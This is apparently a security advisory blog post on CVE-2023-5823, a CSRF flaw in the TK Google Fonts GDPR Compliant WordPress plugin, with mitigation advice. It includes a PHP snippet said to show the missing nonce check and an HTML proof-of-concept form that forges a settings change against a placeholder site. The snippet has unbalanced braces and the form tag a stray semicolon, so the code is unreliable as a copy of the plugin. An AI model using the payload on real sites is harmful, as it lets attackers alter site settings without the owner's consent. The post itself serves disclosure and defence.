CVE-2023-5823: Cross-Site Request Forgery (CSRF) Vulnerability Discovered in ThemeKraft TK Google Fonts GDPR Compliant Plugin Versions <= 2.2.11

A recent discovery of a Cross-Site Request Forgery (CSRF) vulnerability, designated as CVE-2023-5823, affects ThemeKraft's TK Google Fonts GDPR Compliant plugin versions up to and including 2.2.11. This security flaw could potentially expose affected WordPress websites running the vulnerable theme plugin to threats, such as malicious attackers taking control of administrative functions in the affected sites. In this post, we will provide a detailed analysis of this vulnerability, the proof of concept code, and what you can do to fix the issue.

Vulnerability Details

Cross-Site Request Forgery (CSRF) is a type of security flaw that allows attackers to exploit a user's authenticated session to perform actions without the user's consent or knowledge. In the case of CVE-2023-5823, the vulnerable TK Google Fonts GDPR Compliant plugin fails to validate the user's request, enabling attackers to perform unwanted actions on the victim's behalf, such as changing the site's configurations.

The following code snippet exhibits the lack of CSRF validation

// In file tk-google-fonts.php
function tk_google_fonts_admin_page_display() {
 if(current_user_can('manage_options')){
   // No CSRF validation or nonce check
   if(isset($_POST['tk_google_fonts_action'])){
     update_option( 'tk_google_fonts_action', $_POST['tk_google_fonts_action']);
   }
}

This vulnerable code allows attackers to craft malicious requests that could alter the site's settings when an authenticated user visits the crafted page.

Proof of Concept (PoC)

The following HTML code demonstrates how an attacker could create a malicious web page to exploit this vulnerability.

<!DOCTYPE html>
<html>
  <head>
    <title>CSRF POC</title>
  </head>
  <body>
    <h1>CVE-2023-5823 POC</h1>
    <form action="http://vulnerable-wp-site.com/wp-admin/admin.php?page=tk-google-fonts"; method="POST">
      <input type="hidden" name="tk_google_fonts_action" value="malicious_value" />
      <input type="submit" value="Click me" />
    </form>
  </body>
</html>

Whenever an authenticated user clicks the "Click me" button, the malicious form sends a POST request to the vulnerable WordPress site, changing the tk_google_fonts_action option value to malicious_value without the user's consent.

Mitigation

To protect your WordPress site from the CSRF vulnerability, it's advised to update the ThemeKraft TK Google Fonts GDPR Compliant plugin to the latest version available, which should address this issue. If an update is not yet available, you may consider disabling the plugin until a patch has been released.

If an update is available, click the "Update now" button.

You can also follow the official ThemeKraft website and WordPress plugin repository pages to stay updated on any future patches and announcements.

- ThemeKraft Website: https://www.themekraft.com/
- WordPress Plugin Repository: https://wordpress.org/plugins/gdpr-google-fonts/

Conclusion

CVE-2023-5823 serves as a reminder of the importance of keeping your WordPress plugins and themes up-to-date to address any potential security vulnerabilities. This CSRF flaw could allow attackers to perform unintended actions on affected sites, potentially leading to compromised security and website functionality. By updating your ThemeKraft TK Google Fonts GDPR Compliant plugin and staying informed of future patches, you can ensure your site remains secure and protected from such threats.

Timeline

Published on: 11/06/2023 12:15:08 UTC
Last modified on: 11/14/2023 16:18:57 UTC